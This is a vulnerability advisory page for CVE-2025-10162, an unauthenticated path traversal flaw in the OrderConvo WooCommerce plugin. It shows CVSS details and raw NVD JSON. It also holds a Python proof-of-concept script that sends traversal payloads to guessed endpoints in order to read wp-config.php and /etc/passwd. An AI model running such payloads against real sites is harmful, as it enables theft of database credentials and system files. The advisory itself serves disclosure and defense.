Security Vulnerability Report

CVE-2025-10162

Published: 2025-10-07 06:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo WordPress plugin before version 14 does not validate the path of files to be downloaded, which could allow an unauthenticated attacker to read/download arbitrary files via a path traversal attack.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Admin and Customer Messages After Order for WooCommerce: OrderConvo < 14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10162 - OrderConvo WordPress Plugin Path Traversal PoC
# Vulnerability: Unauthenticated Arbitrary File Download via Path Traversal
# Affected: Admin and Customer Messages After Order for WooCommerce (OrderConvo) < v14

import requests

TARGET_URL = "http://target-wordpress-site.com"


def exploit_path_traversal(target_url, target_file):
    """
    Exploit path traversal to read arbitrary files from the WordPress server.
    The OrderConvo plugin fails to sanitize the file path parameter,
    allowing unauthenticated attackers to traverse directories.
    """
    # Construct path traversal payload
    traversal_payload = "../../../" + target_file

    # Typical endpoint for file download in OrderConvo plugin
    # The exact endpoint may vary; commonly a download action is used
    endpoints = [
        f"/wp-admin/admin-ajax.php?action=orderconvo_download&file={traversal_payload}",
        f"/wp-content/plugins/orderconvo/download.php?file={traversal_payload}",
        f"/?orderconvo_download=1&file={traversal_payload}",
    ]

    for endpoint in endpoints:
        url = target_url + endpoint
        print(f"[*] Trying: {url}")
        try:
            response = requests.get(url, timeout=10, allow_redirects=False)
            if response.status_code == 200 and len(response.content) > 0:
                print(f"[+] Success! File content retrieved (HTTP {response.status_code}):")
                print("-" * 60)
                print(response.text[:2000])
                print("-" * 60)
                return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    print("[-] Exploitation failed. Target may not be vulnerable or endpoint differs.")
    return None


if __name__ == "__main__":
    # Target sensitive files commonly sought by attackers
    sensitive_files = [
        "wp-config.php",  # WordPress config (DB credentials)
        "../../../wp-config.php",
        "..\\..\\..\\wp-config.php",
        "/etc/passwd",  # Linux system file
        "../../../../etc/passwd",
    ]
    for f in sensitive_files:
        result = exploit_path_traversal(TARGET_URL, f)
        if result:
            break
```

References

https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10162",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-07T06:15:32.677",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo WordPress plugin before 14 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read/download arbitrary files via a path traversal attack"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/",
        "source": "[email protected]"
      },
      {
        "url": "https://wpscan.com/vulnerability/f878615d-955d-4365-87e0-6c928f548986/",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```